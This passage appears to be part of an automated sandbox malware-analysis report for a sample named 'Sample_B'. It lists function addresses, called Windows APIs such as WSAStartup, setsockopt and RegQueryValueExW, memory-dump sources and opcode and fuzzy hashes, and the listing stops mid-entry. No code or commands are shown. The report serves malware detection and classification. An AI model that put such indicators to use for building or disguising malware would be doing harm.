                                                                                  • Opcode ID: 0465ed9b44a4d4d14b2252c704ad8aa4ef86cb3cea728b9083d0dc31185c4dcd
                                                                                  • Instruction ID: 7ae5c4ab1e16fec4c04b7a1ba7b910405ba2633fc0224fab2138c69cce173bda
                                                                                  • Opcode Fuzzy Hash: 0465ed9b44a4d4d14b2252c704ad8aa4ef86cb3cea728b9083d0dc31185c4dcd
                                                                                  • Instruction Fuzzy Hash: A7018C716002408FEB20CF29D8857A6FB98EB10721F4884ABDD09CB342D674E944DB61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D26C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowPlacement.USER32(?,?), ref: 005D271F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: PlacementWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2154376794-0
                                                                                  • Opcode ID: 813600621f579c97659cdb09219ce5ec971b490e7badee3cf014b07e21652a52
                                                                                  • Instruction ID: 1140ae055df5482de2231f1614f9b09ef336436a3768fd8e9a8106fa37c2c84d
                                                                                  • Opcode Fuzzy Hash: 813600621f579c97659cdb09219ce5ec971b490e7badee3cf014b07e21652a52
                                                                                  • Instruction Fuzzy Hash: 3D11A1755083809FDB21CF15DC45B52FFB4EF16320F0980DBED894B262C275A809DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A172, Relevance: 1.5, APIs: 1, Instructions: 47networkCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • WSAStartup.WS2_32(?,00000E40,?,?), ref: 0027A1BD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Startup
                                                                                  • String ID:
                                                                                  • API String ID: 724789610-0
                                                                                  • Opcode ID: 99d574dda8f2c559446cfff6518e46ef7327dd7e539a38642d409ed2b6bc1beb
                                                                                  • Instruction ID: f3aa4a9e39c0532c4fe269de14c7624fc064a201f150f52b1b02a11b2177656e
                                                                                  • Opcode Fuzzy Hash: 99d574dda8f2c559446cfff6518e46ef7327dd7e539a38642d409ed2b6bc1beb
                                                                                  • Instruction Fuzzy Hash: 8C018471900700AFE710DF16DC46B66FBE8FB84A20F14816AED089B741D235F515CBE5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D19BA, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 005D1A05
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoadShim
                                                                                  • String ID:
                                                                                  • API String ID: 1475914169-0
                                                                                  • Opcode ID: de91802d1bd6d748a5b67eb6fc17463b77b8a35d75909737c54a86ab030d57a9
                                                                                  • Instruction ID: 18991ac5fb70aa705bf3e8e18bbd2f9e9ea934469985ba7c52f2ea7e0e2dfbc7
                                                                                  • Opcode Fuzzy Hash: de91802d1bd6d748a5b67eb6fc17463b77b8a35d75909737c54a86ab030d57a9
                                                                                  • Instruction Fuzzy Hash: 6F016972500A40AFEB30DF19D885B66FFE8FB14720F08859BDD498B702D271E844DB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A5D6, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0027A61A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 5509fd526fe6254cd4a3c7cb0a6ecfc6c17db27f7daa0ca5029ead9409dfd928
                                                                                  • Instruction ID: 919cc1ea411269cda5e6bc8990741ef806b766245affaffe3522c6522dd8b844
                                                                                  • Opcode Fuzzy Hash: 5509fd526fe6254cd4a3c7cb0a6ecfc6c17db27f7daa0ca5029ead9409dfd928
                                                                                  • Instruction Fuzzy Hash: 21016D72410700DFEF21CF55DC44B56FFE4EF58720F08C5AAEE494A611D276A424DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D190E, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: Atom
                                                                                  • String ID:
                                                                                  • API String ID: 2154973765-0
                                                                                  • Opcode ID: 1686ad48f111a40ad5a08c234a1536f1c6bca7f0e047ce3e83148279d815a12a
                                                                                  • Instruction ID: 22700f9c26302d0166949b34400fc400e14ffbfb1e5a49688656107a02785e9d
                                                                                  • Opcode Fuzzy Hash: 1686ad48f111a40ad5a08c234a1536f1c6bca7f0e047ce3e83148279d815a12a
                                                                                  • Instruction Fuzzy Hash: 2C01BC71500740EFEB20CF1AD8957A2FFA4EF01721F0884ABDD498B342D675E804CBA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D00F2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 005D0142
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ConsoleCtrlHandler
                                                                                  • String ID:
                                                                                  • API String ID: 1513847179-0
                                                                                  • Opcode ID: e9d2c8246e32207191fdc40b2c8122801a9e18aa1673714d433db2c63dc6c325
                                                                                  • Instruction ID: 3f0e1e5494740e4144e8390f1238625383a0ab59f1960565a130558d163e5b42
                                                                                  • Opcode Fuzzy Hash: e9d2c8246e32207191fdc40b2c8122801a9e18aa1673714d433db2c63dc6c325
                                                                                  • Instruction Fuzzy Hash: DF016D71940600ABE320DF16DC86B26FBA8FB88A20F14825AED085B741D275F915CBE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D13E2, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileView
                                                                                  • String ID:
                                                                                  • API String ID: 3314676101-0
                                                                                  • Opcode ID: 31c24d44cd5a5d3bf787572c1645a5204c5aaeae0a6f0908b255a2842d4d7435
                                                                                  • Instruction ID: ec8f151c39fefb411026328f50b14970e2d3a57312bf4b337c8cc0b2be60e003
                                                                                  • Opcode Fuzzy Hash: 31c24d44cd5a5d3bf787572c1645a5204c5aaeae0a6f0908b255a2842d4d7435
                                                                                  • Instruction Fuzzy Hash: A7018C32400740EFEF20CF55D884B55FFA0FF04320F0888ABDD494A612C275A418EB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D149E, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 005D14D0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: 77c0fb407ef838b37262721b7b69dbe92bc84fdf379c54735ea7e13a39b6777d
                                                                                  • Instruction ID: 47126b622361f308ee4886824e59efebdf3de225b45fa328ee212c14e771e218
                                                                                  • Opcode Fuzzy Hash: 77c0fb407ef838b37262721b7b69dbe92bc84fdf379c54735ea7e13a39b6777d
                                                                                  • Instruction Fuzzy Hash: 9C01BC75500B00DBEB20CF59E885B92FFA4EB50321F1884ABDC0A8B742D675A844DA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B7B2, Relevance: 1.5, APIs: 1, Instructions: 43registryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • RegQueryValueExW.KERNEL32(?,00000E40,?,?), ref: 0027B802
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: QueryValue
                                                                                  • String ID:
                                                                                  • API String ID: 3660427363-0
                                                                                  • Opcode ID: 908dc20a22c5f558bd5d47b657749f609cb7a0c8949bc5bd5aa8c99e00854244
                                                                                  • Instruction ID: fcaa8637f33d1d364145584740d7da99ce272536928f36710c8b195f75be9a1f
                                                                                  • Opcode Fuzzy Hash: 908dc20a22c5f558bd5d47b657749f609cb7a0c8949bc5bd5aa8c99e00854244
                                                                                  • Instruction Fuzzy Hash: 24016271940600ABE320DF16DC46B26FBA4FB88B20F14825AED095B741D275F515CBE6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A2FA, Relevance: 1.5, APIs: 1, Instructions: 43fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • UnmapViewOfFile.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0027A32C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileUnmapView
                                                                                  • String ID:
                                                                                  • API String ID: 2564024751-0
                                                                                  • Opcode ID: 54364255ed0f0a07e6f56efbac58c5abdbe75ffdff3dd1a322d51392ae907f62
                                                                                  • Instruction ID: 95c2d3c8c0e183a904f233b92114727f2623c6d6a00533d821a39087979df9aa
                                                                                  • Opcode Fuzzy Hash: 54364255ed0f0a07e6f56efbac58c5abdbe75ffdff3dd1a322d51392ae907f62
                                                                                  • Instruction Fuzzy Hash: 96018B76A14340DFEB20CF19DC857AAFBA4EF44731F08C4AADD0D8B642D675A814DA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027B952, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • setsockopt.WS2_32(?,?,?,?,?), ref: 0027B990
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: setsockopt
                                                                                  • String ID:
                                                                                  • API String ID: 3981526788-0
                                                                                  • Opcode ID: d8e1b21bbad36bf93ac04478002c537c68e8794fa121e4645997e0c68294755e
                                                                                  • Instruction ID: 1fa447c5b7fe4a069d399c8d103c2f76b989351f50b0d7e53a1dac803be9e385
                                                                                  • Opcode Fuzzy Hash: d8e1b21bbad36bf93ac04478002c537c68e8794fa121e4645997e0c68294755e
                                                                                  • Instruction Fuzzy Hash: 5B019E32410700DFEB21CF55DC85B95FBA0EF14321F08C4AADE494A612D371A418DF62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D3216, Relevance: 1.5, APIs: 1, Instructions: 42windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 8666b54d716be1ec1b62d9fc71e87ce013730f37b5faac271cf52ceb8f7c7836
                                                                                  • Instruction ID: 9887661167b34f0c7f3683a64d6cf81e3bab8c49f011afac997398dc013a69c9
                                                                                  • Opcode Fuzzy Hash: 8666b54d716be1ec1b62d9fc71e87ce013730f37b5faac271cf52ceb8f7c7836
                                                                                  • Instruction Fuzzy Hash: C401B136904700DBEB208F19DC85B66FFA0FF15320F08C4AFDD494A751C271A514EB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D2BC6, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ShowWindow
                                                                                  • String ID:
                                                                                  • API String ID: 1268545403-0
                                                                                  • Opcode ID: 5978535ba4b2ddc6525a3556d45a11788b81d9612a6c9437b6bdfaa322cc8e56
                                                                                  • Instruction ID: 3313e0401a86bdeab5924ade67da43ae03f45fcc24ca84517f7a3ae6ad938872
                                                                                  • Opcode Fuzzy Hash: 5978535ba4b2ddc6525a3556d45a11788b81d9612a6c9437b6bdfaa322cc8e56
                                                                                  • Instruction Fuzzy Hash: 8801A236514740DBEB208F19D885755FFA4EF14721F08C4ABDD494B751C671A848DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D3096, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyWindow
                                                                                  • String ID:
                                                                                  • API String ID: 3375834691-0
                                                                                  • Opcode ID: b464b8e4d48fdf6dbac85fa1aaf0120c316be0c958abcbd38c672cb10b9085fb
                                                                                  • Instruction ID: d1a58ae37ca1e5e41fa85f76343787f0b4ec47fe587a5f2653db642b6d69d728
                                                                                  • Opcode Fuzzy Hash: b464b8e4d48fdf6dbac85fa1aaf0120c316be0c958abcbd38c672cb10b9085fb
                                                                                  • Instruction Fuzzy Hash: 1D01AD35604740CBEB208F19D889762FFA4EB14721F08C0ABDD0A8B752D671AA08DB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A8AE, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: closesocket
                                                                                  • String ID:
                                                                                  • API String ID: 2781271927-0
                                                                                  • Opcode ID: 800a8bdc7eece8165ba149d77277ce6f6a0899a0218288829c46579f838b33a6
                                                                                  • Instruction ID: 932b5f81512f56841ecaed9bc9a5cbe86fa79179a74c0a3369a7f45d9de0099e
                                                                                  • Opcode Fuzzy Hash: 800a8bdc7eece8165ba149d77277ce6f6a0899a0218288829c46579f838b33a6
                                                                                  • Instruction Fuzzy Hash: 5B01AD71820340DFEB20CF15D8857A5FBA0EF44331F18C4AADD0D8B202D275A914DBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D278A, Relevance: 1.5, APIs: 1, Instructions: 38windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 194c49a6328ee5512ef1cf8056c36c78278efb58e97f58ed450bb15efb7e5b38
                                                                                  • Instruction ID: ee3a997b31b5f2e67a5ef030f9eca1de05ce35d849d64f22c770661420adcec3
                                                                                  • Opcode Fuzzy Hash: 194c49a6328ee5512ef1cf8056c36c78278efb58e97f58ed450bb15efb7e5b38
                                                                                  • Instruction Fuzzy Hash: E6017836904740DFEB308F09D884B61FFA0FB28721F08849AED494A712C271A458EB62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005D26EA, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetWindowPlacement.USER32(?,?), ref: 005D271F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076067982.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5d0000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: PlacementWindow
                                                                                  • String ID:
                                                                                  • API String ID: 2154376794-0
                                                                                  • Opcode ID: 0edc946949b9ac579d823d64401e322f420a5d65fc9548a4f6ada09ae54dc504
                                                                                  • Instruction ID: 44bedb072760f59be22285fb3a46a2703df95d566f2fc10d322ba529ed1b5f0d
                                                                                  • Opcode Fuzzy Hash: 0edc946949b9ac579d823d64401e322f420a5d65fc9548a4f6ada09ae54dc504
                                                                                  • Instruction Fuzzy Hash: E3016935904740DBEB30CF09D885B61FFA0EF24721F08C4ABDD494B752C275A908EA62
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0027A69A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(?,12098A28,00000000,?,?,?,?,?,?,?,?,73F33C58), ref: 0027A6CC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075660129.000000000027A000.00000040.00000001.sdmp, Offset: 0027A000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_27a000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode
                                                                                  • String ID:
                                                                                  • API String ID: 2340568224-0
                                                                                  • Opcode ID: 87e5900036158dabe56a7fce63cb4791da3d005a1d2ebf63a58e31cd9698d673
                                                                                  • Instruction ID: d872fef8af927b1e1183a0c5463b5262d4da5e401dda695ed8eb75088697d371
                                                                                  • Opcode Fuzzy Hash: 87e5900036158dabe56a7fce63cb4791da3d005a1d2ebf63a58e31cd9698d673
                                                                                  • Instruction Fuzzy Hash: B6F08735924740DFEF20DF06D889765FBA4EB45731F08C0AADD094B212D2B5A958EAA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005502D0, Relevance: .1, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c1997ab4a2c0bd6a9baa5d73d596a49bfa56a53a7adb97119c16362335776931
                                                                                  • Instruction ID: 9bf56356d338ce42d0d77a2b00cb8a605e6e24b33f4b25074527fc17ef41c4de
                                                                                  • Opcode Fuzzy Hash: c1997ab4a2c0bd6a9baa5d73d596a49bfa56a53a7adb97119c16362335776931
                                                                                  • Instruction Fuzzy Hash: BC418C78A00208DFDB04DFA8C594BADBBF1BF4D311F1054A5EA02AB3A0D735A954DF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00551C5F, Relevance: .1, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a9c08419ba45e976f3e34c754824b04ae35837f727b5288e421017ba0ec12f5e
                                                                                  • Instruction ID: 236e8a2825b3a5786d2cb610909722a9373e60e58e0ccf70044e398f5fc5d54c
                                                                                  • Opcode Fuzzy Hash: a9c08419ba45e976f3e34c754824b04ae35837f727b5288e421017ba0ec12f5e
                                                                                  • Instruction Fuzzy Hash: D6312A30E52208CFDB19DBB8C4919EEB772EF8A301F50996DE40137350DB36A849CB54
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00551C60, Relevance: .1, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 76d85940157b57394e0e43a786f99b83f3c2ef521ab9aa1c5422dbe800564919
                                                                                  • Instruction ID: 4c677f99874c7f3982a39fac3a4b8e9368096e3557d517c4e6868acd51c8b95b
                                                                                  • Opcode Fuzzy Hash: 76d85940157b57394e0e43a786f99b83f3c2ef521ab9aa1c5422dbe800564919
                                                                                  • Instruction Fuzzy Hash: 15310730E52208CFDB19EBB8C4919EEB772EF8A305F50996DE40137350DB36A849CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00A8094E, Relevance: .1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 2107974e0018423311e61a6aa89a3b18e0b0c76f3eb303d670d520c72ce06ded
                                                                                  • Instruction ID: 2489c0325ce51a383414d092a8f0e01227a8aa42d52f81d153f923c49ac51658
                                                                                  • Opcode Fuzzy Hash: 2107974e0018423311e61a6aa89a3b18e0b0c76f3eb303d670d520c72ce06ded
                                                                                  • Instruction Fuzzy Hash: 992179355097C0CFD707CB20D890B51BFB1AF46318F1981EED8889B6A3C73A980ACB52
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00A80984, Relevance: .1, Instructions: 59COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ea5f0276d7cbaa6d31052f4f7e8786e0735c73194a69e7976a43f6177a34b358
                                                                                  • Instruction ID: 4a44ab21ae35b87ecc5b1a7101dde547212ed75d8d9198e8490ac3640172224b
                                                                                  • Opcode Fuzzy Hash: ea5f0276d7cbaa6d31052f4f7e8786e0735c73194a69e7976a43f6177a34b358
                                                                                  • Instruction Fuzzy Hash: 4611E435204384DFE325EB10C880F15F7A1AB88708F24C5ADE8490B643C77BD807DB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00A807F8, Relevance: .0, Instructions: 44COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2076139871.0000000000A80000.00000040.00000040.sdmp, Offset: 00A80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_a80000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dfeb13113e235171247c2af86959676c5f7059fd0f64c2abf1e6c856f913c760
                                                                                  • Instruction ID: 8001f7562d0b208ea7e7aa18ab872f9969d3dde657dcd2facc9cb93cca7abd27
                                                                                  • Opcode Fuzzy Hash: dfeb13113e235171247c2af86959676c5f7059fd0f64c2abf1e6c856f913c760
                                                                                  • Instruction Fuzzy Hash: 3B0186B6509780AFD711CF159C40863FFE8EF86660749C4AFEC498B612D225B905CBA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550448, Relevance: .0, Instructions: 40COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8e90a8755c4761227b80e8b3ca0241defe4d0f7d58261ff0dff772c376618b73
                                                                                  • Instruction ID: 1af36575ffb78ef3d89380db24694473023d4e075d97c27fca9296910f9fb6a5
                                                                                  • Opcode Fuzzy Hash: 8e90a8755c4761227b80e8b3ca0241defe4d0f7d58261ff0dff772c376618b73
                                                                                  • Instruction Fuzzy Hash: DFF0FF30943208DFDB19DFB4D554BAE7376EF86309F205CA98405233548B7A9E41EB09
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00550822, Relevance: .0, Instructions: 34COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_550000_Sample_B.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: afe52d2f00f9f90c0f5d33a41cc043c941651088b769e2630944069877be168f
                                                                                  • Instruction ID: 215f385608cff3c6ca338b600b2597b58635884f86be2f1a0da9dd1a14987fa8
                                                                                  • Opcode Fuzzy Hash: afe52d2f00f9f90c0f5d33a41cc043c941651088b769e2630944069877be168f
                                                                                  • Instruction Fuzzy Hash: 0601E438D09249EFCB05DBA8D9849ADBFF0BF49300F2585DAD848A7352D630AE15DB91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 005500C0, Relevance: .0, Instructions: 33COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2075974979.0000000000550000.00000040.00000001.sdmp, Offset: 00550000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
